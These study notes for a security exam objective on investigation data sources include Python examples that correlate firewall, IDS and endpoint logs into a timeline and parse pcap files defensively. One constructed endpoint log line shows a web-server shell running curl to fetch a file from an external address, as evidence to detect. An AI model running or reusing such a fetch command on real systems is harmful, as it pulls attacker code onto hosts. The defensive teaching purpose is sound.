OBJECTIVE 4.9 Given a scenario (PBQ-likely)

Use data sources to support an investigation

Log data (firewall, application, endpoint, OS security, IDS/IPS, network, metadata), data sources (vulnerability scans, automated reports, dashboards, packet captures), and log management (syslog, rsyslog, journalctl, NXLog, retention, security considerations).

Exam approach: “Given a scenario” — expect to identify which data sources are relevant to an investigation, correlate events across multiple log types, and extract IOCs from packet captures or scan reports. The PBQ will likely present logs and ask you to build a timeline or identify the attack vector.
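The correlation-and-timeline task described above, as an added worked example (not part of these notes or of any CompTIA material): three constructed log feeds (firewall, IDS, endpoint) in an assumed "<ISO-8601 UTC timestamp> <host> <message>" format are normalized into one timeline, external IP indicators are extracted, and each indicator is pivoted back across the sources that corroborate it. The internal address ranges, hostnames, addresses and log wording are all assumptions made for the example.

```python
import re
from datetime import datetime, timezone
from ipaddress import ip_address, ip_network

# Constructed sample lines (not real data). Assumed format: "<ISO-8601 UTC> <host> <message>".
FIREWALL_LOGS = [
    "2024-03-01T10:02:11Z fw01 DENY src=203.0.113.45 dst=10.0.0.5 dport=22 proto=tcp",
    "2024-03-01T10:02:13Z fw01 ALLOW src=203.0.113.45 dst=10.0.0.5 dport=443 proto=tcp",
]
IDS_LOGS = [
    '2024-03-01T10:02:14Z ids01 ALERT sig="WEB possible SQLi" src=203.0.113.45 dst=10.0.0.5',
]
ENDPOINT_LOGS = [
    "2024-03-01T10:02:20Z web01 process_create user=www-data cmd=/bin/sh -c 'curl http://203.0.113.45/x'",
]

# Ranges treated as "ours" (assumption); any other address is an external IOC candidate.
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("172.16.0.0/12"), ip_network("192.168.0.0/16")]

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(.*)$")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def parse_line(source, line):
    """Normalize one raw line into an event dict; return None for lines that do not fit the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts_text, host, msg = m.groups()
    try:
        ts = datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    except ValueError:
        return None
    ips = set()
    for cand in IPV4_RE.findall(msg):
        try:
            ips.add(str(ip_address(cand)))  # drops "999.1.2.3"-style false matches
        except ValueError:
            pass
    return {"ts": ts, "source": source, "host": host, "msg": msg, "ips": ips}


def build_timeline(sources):
    """Merge {source_name: [lines]} into one list of events ordered by UTC timestamp."""
    events = []
    for name, lines in sources.items():
        for line in lines:
            ev = parse_line(name, line)
            if ev:
                events.append(ev)
    events.sort(key=lambda e: e["ts"])
    return events


def is_external(ip):
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def extract_iocs(timeline):
    """External addresses seen anywhere in the timeline."""
    return {ip for ev in timeline for ip in ev["ips"] if is_external(ip)}


def pivot(timeline, ioc):
    """All events, from every source, that mention the indicator."""
    return [ev for ev in timeline if ioc in ev["ips"]]


def corroborating_sources(timeline, ioc):
    """Distinct log types that independently saw the indicator (more types = higher confidence)."""
    return sorted({ev["source"] for ev in pivot(timeline, ioc)})


def render(timeline):
    return "\n".join(f"{ev['ts'].isoformat()} [{ev['source']:8}] {ev['host']}: {ev['msg']}" for ev in timeline)


if __name__ == "__main__":
    tl = build_timeline({"firewall": FIREWALL_LOGS, "ids": IDS_LOGS, "endpoint": ENDPOINT_LOGS})
    print(render(tl))
    for ioc in sorted(extract_iocs(tl)):
        print(ioc, "corroborated by", corroborating_sources(tl, ioc))
```

The ordering step is the one that matters in a PBQ: once every feed shares one clock (UTC here), the firewall deny, the IDS alert and the endpoint process creation line up into a story, and an indicator seen by three independent log types is a far stronger finding than one seen by a single sensor.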

Offensive context: Packet capture analysis uses the same skills as building an interception proxy — identifying magic bytes, length fields, protocol anomalies. Understanding memory exploitation makes RAM acquisition meaningful (you know what you’re looking for in a heap dump). And deploying honey-files as canary traps gives you a specific, high-confidence investigation data source when they get tripped.
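The magic-byte and length-field checks mentioned above, as an added example (not from these notes or from any tool the page names): a minimal classic-pcap reader that identifies the file by its magic, honours the per-record length field, flags records whose lengths are inconsistent or truncated, and pulls IPv4 source/destination pairs out of Ethernet frames as investigation IOCs. The capture bytes are constructed in memory; the MAC and IP addresses are assumptions.

```python
import struct
from ipaddress import IPv4Address

PCAP_MAGIC = 0xA1B2C3D4  # classic pcap, microsecond timestamps


def ipv4_frame(src, dst, payload=b""):
    """Constructed Ethernet II + IPv4 frame (checksum left zero); enough for header parsing."""
    eth = b"\x00\x11\x22\x33\x44\x55" + b"\x66\x77\x88\x99\xaa\xbb" + struct.pack("!H", 0x0800)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 1, 0, 64, 6, 0,
                     IPv4Address(src).packed, IPv4Address(dst).packed)
    return eth + ip + payload


def build_pcap(frames, little_endian=True, snaplen=65535):
    """Assemble a pcap file in memory (global header + one record per frame)."""
    e = "<" if little_endian else ">"
    out = struct.pack(e + "IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, snaplen, 1)  # linktype 1 = Ethernet
    for i, f in enumerate(frames):
        out += struct.pack(e + "IIII", 1709287331 + i, 0, len(f), len(f)) + f
    return out


def parse_pcap(data):
    """Walk records by their length fields; report anomalies instead of guessing past them."""
    if len(data) < 24:
        raise ValueError("truncated global header")
    first = struct.unpack("<I", data[:4])[0]
    if first == PCAP_MAGIC:
        e = "<"
    elif first == 0xD4C3B2A1:          # same magic written big-endian
        e = ">"
    else:
        raise ValueError("bad magic 0x%08x: not a classic pcap" % first)
    _, vmaj, vmin, _, _, snaplen, linktype = struct.unpack(e + "IHHiIII", data[:24])
    packets, anomalies = [], []
    off = 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl, orig = struct.unpack(e + "IIII", data[off:off + 16])
        if incl > snaplen or incl > orig:
            anomalies.append(f"record @{off}: incl_len {incl} inconsistent (snaplen {snaplen}, orig {orig})")
            break
        if off + 16 + incl > len(data):
            anomalies.append(f"record @{off}: truncated (needs {incl} bytes, {len(data) - off - 16} remain)")
            break
        frame = data[off + 16: off + 16 + incl]
        pkt = {"ts": ts_sec + ts_usec / 1e6, "len": incl, "src": None, "dst": None}
        # Ethernet: ethertype at 12..14, IPv4 header at 14; src/dst at IP offsets 12 and 16
        if linktype == 1 and len(frame) >= 34 and frame[12:14] == b"\x08\x00" and frame[14] >> 4 == 4:
            pkt["src"] = str(IPv4Address(frame[26:30]))
            pkt["dst"] = str(IPv4Address(frame[30:34]))
        packets.append(pkt)
        off += 16 + incl
    if not anomalies and off != len(data):
        anomalies.append(f"{len(data) - off} trailing bytes after last record")
    return {"version": (vmaj, vmin), "linktype": linktype, "packets": packets, "anomalies": anomalies}


def ip_pairs(parsed):
    """Distinct (src, dst) pairs, the starting point for an IOC list."""
    return sorted({(p["src"], p["dst"]) for p in parsed["packets"] if p["src"]})


if __name__ == "__main__":
    cap = build_pcap([ipv4_frame("203.0.113.45", "10.0.0.5", b"GET / HTTP/1.1\r\n"),
                      ipv4_frame("10.0.0.5", "203.0.113.45")])
    result = parse_pcap(cap)
    print(result["packets"], result["anomalies"], ip_pairs(result))
```

The defensive habit on show is refusing to trust a length field blindly: a record whose included length exceeds the snaplen or the bytes remaining is reported as an anomaly and parsing stops, which is exactly the behaviour a proxy or decoder needs so that a malformed capture cannot push it into reading past its buffer.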

LABS FOR THIS OBJECTIVE